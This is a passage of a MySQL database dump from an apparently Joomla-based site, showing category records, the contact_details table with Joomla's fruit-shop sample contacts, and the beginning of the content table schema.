00:00:00',0,'*',1),(37,62,35,27,80,3,'sample-data-contact/shop-site/fruit-encyclopedia','com_contact','Fruit Encyclopedia','fruit-encyclopedia','','<p> </p><p>Our directory of information about different kinds of fruit.</p><p>We love fruit and want the world to know more about all of its many varieties.</p><p>Although it is small now, we work on it whenever we have a chance.</p><p>All of the images can be found in <a href=\"http://commons.wikimedia.org/wiki/Main_Page\">Wikimedia Commons</a>.</p><p><img src=\"images/sampledata/fruitshop/apple.jpg\" border=\"0\" alt=\"Apples\" title=\"Apples\" /></p><p><em>This encyclopedia is implemented using the contact component, each fruit a separate contact and a category for each letter. A CSS style is used to create the horizontal layout of the alphabet headings. </em></p><p><em>If you wanted to, you could allow some users (such as your growers) to have access to just this category in the contact component and let them help you to create new content for the encyclopedia.</em></p><p> </p>',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(38,63,37,28,29,4,'sample-data-contact/shop-site/fruit-encyclopedia/a','com_contact','A','a','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(39,64,37,30,31,4,'sample-data-contact/shop-site/fruit-encyclopedia/b','com_contact','B','b','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(40,65,37,32,33,4,'sample-data-contact/shop-site/fruit-encyclopedia/c','com_contact','C','c','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(41,66,37,34,35,4,'sample-data-contact/shop-site/fruit-encyclopedia/d','com_contact','D','d','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(42,67,37,36,37,4,'sample-data-contact/shop-site/fruit-encyclopedia/e','com_contact','E','e','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(43,68,37,38,39,4,'sample-data-contact/shop-site/fruit-encyclopedia/f','com_contact','F','f','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(44,69,37,40,41,4,'sample-data-contact/shop-site/fruit-encyclopedia/g','com_contact','G','g','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(45,70,37,42,43,4,'sample-data-contact/shop-site/fruit-encyclopedia/h','com_contact','H','h','','',0,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(46,71,37,44,45,4,'sample-data-contact/shop-site/fruit-encyclopedia/i','com_contact','I','i','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(47,72,37,46,47,4,'sample-data-contact/shop-site/fruit-encyclopedia/j','com_contact','J','j','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(48,73,37,48,49,4,'sample-data-contact/shop-site/fruit-encyclopedia/k','com_contact','K','k','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(49,74,37,50,51,4,'sample-data-contact/shop-site/fruit-encyclopedia/l','com_contact','L','l','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(50,75,37,52,53,4,'sample-data-contact/shop-site/fruit-encyclopedia/m','com_contact','M','m','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(51,76,37,54,55,4,'sample-data-contact/shop-site/fruit-encyclopedia/n','com_contact','N','n','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(52,77,37,56,57,4,'sample-data-contact/shop-site/fruit-encyclopedia/o','com_contact','O','o','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(53,78,37,58,59,4,'sample-data-contact/shop-site/fruit-encyclopedia/p','com_contact','P','p','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(54,79,37,60,61,4,'sample-data-contact/shop-site/fruit-encyclopedia/q','com_contact','Q','q','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(55,80,37,62,63,4,'sample-data-contact/shop-site/fruit-encyclopedia/r','com_contact','R','r','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(56,81,37,64,65,4,'sample-data-contact/shop-site/fruit-encyclopedia/s','com_contact','S','s','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(57,82,37,66,67,4,'sample-data-contact/shop-site/fruit-encyclopedia/t','com_contact','T','t','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(58,83,37,68,69,4,'sample-data-contact/shop-site/fruit-encyclopedia/u','com_contact','U','u','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(59,84,37,70,71,4,'sample-data-contact/shop-site/fruit-encyclopedia/v','com_contact','V','v','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(60,85,37,72,73,4,'sample-data-contact/shop-site/fruit-encyclopedia/w','com_contact','W','w','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(61,86,37,74,75,4,'sample-data-contact/shop-site/fruit-encyclopedia/x','com_contact','X','x','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(62,87,37,76,77,4,'sample-data-contact/shop-site/fruit-encyclopedia/y','com_contact','Y','y','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(63,88,37,78,79,4,'sample-data-contact/shop-site/fruit-encyclopedia/z','com_contact','Z','z','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(77,169,1,89,90,1,'uncategorised','com_users','Uncategorised','uncategorised','','',1,0,'0000-00-00 00:00:00',1,'{\"target\":\"\",\"image\":\"\"}','','','{\"page_title\":\"\",\"author\":\"\",\"robots\":\"\"}',692,'2011-01-01 00:00:01',0,'0000-00-00 00:00:00',0,'*',1),(79,179,1,91,100,1,'blog','com_content','Blog','blog','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2015-02-02 06:12:46',0,'0000-00-00 00:00:00',0,'*',1),(80,191,79,92,93,2,'blog/news','com_content','News','news','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2015-02-02 18:42:14',864,'2015-02-02 18:42:30',0,'*',1),(81,192,79,94,95,2,'blog/tutorial','com_content','Tutorial','tutorial','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2015-02-02 18:42:46',0,'0000-00-00 00:00:00',0,'*',1),(82,193,79,96,97,2,'blog/review','com_content','Review','review','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2015-02-02 18:42:56',0,'0000-00-00 00:00:00',0,'*',1),(83,194,79,98,99,2,'blog/updates','com_content','Updates','updates','','',-2,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2015-02-02 18:43:15',0,'0000-00-00 00:00:00',0,'*',1),(84,218,1,101,102,1,'new-category','com_imagerecycle','COM_IMAGERECYCLE_INSTALLER_NEW_CATEGORY','new-category','','',1,0,'0000-00-00 00:00:00',1,'','','','',692,'2015-10-25 07:23:21',0,'2015-10-25 07:23:21',0,'*',1),(85,225,1,103,104,1,'header','com_djimageslider','Header','header','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2016-02-25 19:01:27',0,'2016-02-25 19:01:27',0,'*',1),(86,234,1,105,106,1,'dashlogic-products','com_content','Products','dashlogic-products','','',1,0,'0000-00-00 00:00:00',1,'{\"category_layout\":\"\",\"image\":\"\",\"image_alt\":\"\"}','','','{\"author\":\"\",\"robots\":\"\"}',692,'2016-02-28 08:41:01',0,'2016-02-28 08:41:01',0,'*',1);
/*!40000 ALTER TABLE `atlyh_categories` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_contact_details`
--
DROP TABLE IF EXISTS `atlyh_contact_details`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_contact_details` (
`id` int(11) NOT NULL AUTO_INCREMENT,
`name` varchar(255) NOT NULL DEFAULT '',
`alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`con_position` varchar(255) DEFAULT NULL,
`address` text DEFAULT NULL,
`suburb` varchar(100) DEFAULT NULL,
`state` varchar(100) DEFAULT NULL,
`country` varchar(100) DEFAULT NULL,
`postcode` varchar(100) DEFAULT NULL,
`telephone` varchar(255) DEFAULT NULL,
`fax` varchar(255) DEFAULT NULL,
`misc` mediumtext DEFAULT NULL,
`image` varchar(255) DEFAULT NULL,
`email_to` varchar(255) DEFAULT NULL,
`default_con` tinyint(1) unsigned NOT NULL DEFAULT 0,
`published` tinyint(1) NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`ordering` int(11) NOT NULL DEFAULT 0,
`params` text NOT NULL,
`user_id` int(11) NOT NULL DEFAULT 0,
`catid` int(11) NOT NULL DEFAULT 0,
`access` int(10) unsigned NOT NULL DEFAULT 0,
`mobile` varchar(255) NOT NULL DEFAULT '',
`webpage` varchar(255) NOT NULL DEFAULT '',
`sortname1` varchar(255) NOT NULL,
`sortname2` varchar(255) NOT NULL,
`sortname3` varchar(255) NOT NULL,
`language` char(7) NOT NULL,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`metakey` text NOT NULL,
`metadesc` text NOT NULL,
`metadata` text NOT NULL,
`featured` tinyint(3) unsigned NOT NULL DEFAULT 0 COMMENT 'Set if article is featured.',
`xreference` varchar(50) NOT NULL COMMENT 'A reference to enable linkages to external data sets.',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_down` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`version` int(10) unsigned NOT NULL DEFAULT 1,
`hits` int(10) unsigned NOT NULL DEFAULT 0,
PRIMARY KEY (`id`),
KEY `idx_access` (`access`),
KEY `idx_checkout` (`checked_out`),
KEY `idx_state` (`published`),
KEY `idx_catid` (`catid`),
KEY `idx_createdby` (`created_by`),
KEY `idx_featured_catid` (`featured`,`catid`),
KEY `idx_language` (`language`),
KEY `idx_xreference` (`xreference`)
) ENGINE=InnoDB AUTO_INCREMENT=9 DEFAULT CHARSET=utf8 COLLATE=utf8_general_ci;
/*!40101 SET character_set_client = @saved_cs_client */;
--
-- Dumping data for table `atlyh_contact_details`
--
LOCK TABLES `atlyh_contact_details` WRITE;
/*!40000 ALTER TABLE `atlyh_contact_details` DISABLE KEYS */;
INSERT INTO `atlyh_contact_details` VALUES (1,'Contact Name Here','name','Position','Street Address','Suburb','State','Country','Zip Code','Telephone','Fax','<p>Information about or by the contact.</p>','images/powered_by.png','email@example.com',1,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Twitter\",\"linka\":\"http:\\/\\/twitter.com\\/joomla\",\"linkb_name\":\"YouTube\",\"linkb\":\"http:\\/\\/www.youtube.com\\/user\\/joomla\",\"linkc_name\":\"Facebook\",\"linkc\":\"http:\\/\\/www.facebook.com\\/joomla\",\"linkd_name\":\"FriendFeed\",\"linkd\":\"http:\\/\\/friendfeed.com\\/joomla\",\"linke_name\":\"Scribed\",\"linke\":\"http:\\/\\/www.scribd.com\\/people\\/view\\/504592-joomla\",\"contact_layout\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,16,1,'','','last','first','middle','en-GB','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,11),(2,'Webmaster','webmaster','','','','','','','','','','','webmaster@example.com',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"1\",\"show_email_copy\":\"1\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"1\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,34,1,'','','','','','en-GB','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,1),(3,'Owner','owner','','','','','','','','','<p>I\'m the owner of this store.</p>','','',0,1,0,'0000-00-00 00:00:00',2,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(4,'Buyer','buyer','','','','','','','','','<p>I am in charge of buying fruit. If you sell good fruit, contact me.</p>','','',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"0\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,36,1,'','','','','','*','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,2),(5,'Bananas','bananas','Scientific Name: Musa','Image Credit: Enzik\r\nRights: Creative Commons Share Alike Unported 3.0\r\nSource: http://commons.wikimedia.org/wiki/File:Bananas_-_Morocco.jpg','','Type: Herbaceous','Large Producers: India, China, Brasil','','','','<p>Bananas are a great source of potassium.</p>\r\n<p> </p>','images/sampledata/fruitshop/bananas_2.jpg','',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"show_with_link\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"1\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"1\",\"show_postcode\":\"\",\"show_country\":\"1\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Banana English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Banana\",\"linkb_name\":\"Wikipedia: \\u0939\\u093f\\u0928\\u094d\\u0926\\u0940 \\u0915\\u0947\\u0932\\u093e\",\"linkb\":\"http:\\/\\/hi.wikipedia.org\\/wiki\\/%E0%A4%95%E0%A5%87%E0%A4%B2%E0%A4%BE\",\"linkc_name\":\"Wikipedia:Banana Portugu\\u00eas\",\"linkc\":\"http:\\/\\/pt.wikipedia.org\\/wiki\\/Banana\",\"linkd_name\":\"Wikipedia: \\u0411\\u0430\\u043d\\u0430\\u043d \\u0420\\u0443\\u0441\\u0441\\u043a\\u0438\\u0439\",\"linkd\":\"http:\\/\\/ru.wikipedia.org\\/\\u0411\\u0430\\u043d\\u0430\\u043d\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,39,1,'','','','','','*','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(6,'Apples','apples','Scientific Name: Malus domestica','Image Credit: Fievet\r\nRights: Public Domain\r\nSource: http://commons.wikimedia.org/wiki/File:Pommes_vertes.JPG','','Family: Rosaceae','Large: Producers: China, United States','','','','<p>Apples are a versatile fruit, used for eating, cooking, and preserving.</p>\r\n<p>There are more that 7500 different kinds of apples grown around the world.</p>','images/sampledata/fruitshop/apple.jpg','',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Apples English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Apple\",\"linkb_name\":\"Wikipedia: Manzana Espa\\u00f1ol \",\"linkb\":\"http:\\/\\/es.wikipedia.org\\/wiki\\/Manzana\",\"linkc_name\":\"Wikipedia: \\u82f9\\u679c \\u4e2d\\u6587\",\"linkc\":\"http:\\/\\/zh.wikipedia.org\\/zh\\/\\u82f9\\u679c\",\"linkd_name\":\"Wikipedia: Tofaa Kiswahili\",\"linkd\":\"http:\\/\\/sw.wikipedia.org\\/wiki\\/Tofaa\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,38,1,'','','','','','*','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,1),(7,'Tamarind','tamarind','Scientific Name: Tamarindus indica','Image Credit: Franz Eugen Köhler, Köhler\'s Medizinal-Pflanzen \r\nRights: Public Domain\r\nSource:http://commons.wikimedia.org/wiki/File:Koeh-134.jpg','','Family: Fabaceae','Large Producers: India, United States','','','','<p>Tamarinds are a versatile fruit used around the world. In its young form it is used in hot sauces; ripened it is the basis for many refreshing drinks.</p>\r\n<p> </p>','images/sampledata/fruitshop/tamarind.jpg','',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"plain\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"1\",\"linka_name\":\"Wikipedia: Tamarind English\",\"linka\":\"http:\\/\\/en.wikipedia.org\\/wiki\\/Tamarind\",\"linkb_name\":\"Wikipedia: \\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2 \\u09ac\\u09be\\u0982\\u09b2\\u09be \",\"linkb\":\"http:\\/\\/bn.wikipedia.org\\/wiki\\/\\u09a4\\u09c7\\u0981\\u09a4\\u09c1\\u09b2 \",\"linkc_name\":\"Wikipedia: Tamarinier Fran\\u00e7ais\",\"linkc\":\"http:\\/\\/fr.wikipedia.org\\/wiki\\/Tamarinier\",\"linkd_name\":\"Wikipedia:Tamaline lea faka-Tonga\",\"linkd\":\"http:\\/\\/to.wikipedia.org\\/wiki\\/Tamaline\",\"linke_name\":\"\",\"linke\":\"\",\"contact_layout\":\"beez5:encyclopedia\"}',0,57,1,'','','','','','*','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',0,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,0),(8,'Shop Address','shop-address','','','Our City','Our Province','Our Country','','555-555-5555','','<p>Here are directions for how to get to our shop.</p>','','',0,1,0,'0000-00-00 00:00:00',1,'{\"show_contact_category\":\"\",\"show_contact_list\":\"\",\"presentation_style\":\"\",\"show_name\":\"\",\"show_position\":\"\",\"show_email\":\"\",\"show_street_address\":\"\",\"show_suburb\":\"\",\"show_state\":\"\",\"show_postcode\":\"\",\"show_country\":\"\",\"show_telephone\":\"\",\"show_mobile\":\"\",\"show_fax\":\"\",\"show_webpage\":\"\",\"show_misc\":\"\",\"show_image\":\"\",\"allow_vcard\":\"\",\"show_articles\":\"\",\"show_profile\":\"\",\"show_links\":\"\",\"linka_name\":\"\",\"linka\":\"\",\"linkb_name\":\"\",\"linkb\":\"\",\"linkc_name\":\"\",\"linkc\":\"\",\"linkd_name\":\"\",\"linkd\":\"\",\"linke_name\":\"\",\"linke\":\"\",\"show_email_form\":\"\",\"show_email_copy\":\"\",\"banned_email\":\"\",\"banned_subject\":\"\",\"banned_text\":\"\",\"validate_session\":\"\",\"custom_reply\":\"\",\"redirect\":\"\"}',0,35,1,'','','','','','*','2011-01-01 00:00:01',692,'Joomla','0000-00-00 00:00:00',0,'','','{\"robots\":\"\",\"rights\":\"\"}',1,'','0000-00-00 00:00:00','0000-00-00 00:00:00',1,1);
/*!40000 ALTER TABLE `atlyh_contact_details` ENABLE KEYS */;
UNLOCK TABLES;
--
-- Table structure for table `atlyh_content`
--
DROP TABLE IF EXISTS `atlyh_content`;
/*!40101 SET @saved_cs_client = @@character_set_client */;
/*!40101 SET character_set_client = utf8 */;
CREATE TABLE `atlyh_content` (
`id` int(10) unsigned NOT NULL AUTO_INCREMENT,
`asset_id` int(10) unsigned NOT NULL DEFAULT 0 COMMENT 'FK to the #__assets table.',
`title` varchar(255) NOT NULL DEFAULT '',
`alias` varchar(255) CHARACTER SET utf8 COLLATE utf8_bin NOT NULL DEFAULT '',
`introtext` mediumtext NOT NULL,
`fulltext` mediumtext NOT NULL,
`state` tinyint(3) NOT NULL DEFAULT 0,
`catid` int(10) unsigned NOT NULL DEFAULT 0,
`created` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`created_by` int(10) unsigned NOT NULL DEFAULT 0,
`created_by_alias` varchar(255) NOT NULL DEFAULT '',
`modified` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`modified_by` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out` int(10) unsigned NOT NULL DEFAULT 0,
`checked_out_time` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
`publish_up` datetime NOT NULL DEFAULT '0000-00-00 00:00:00',
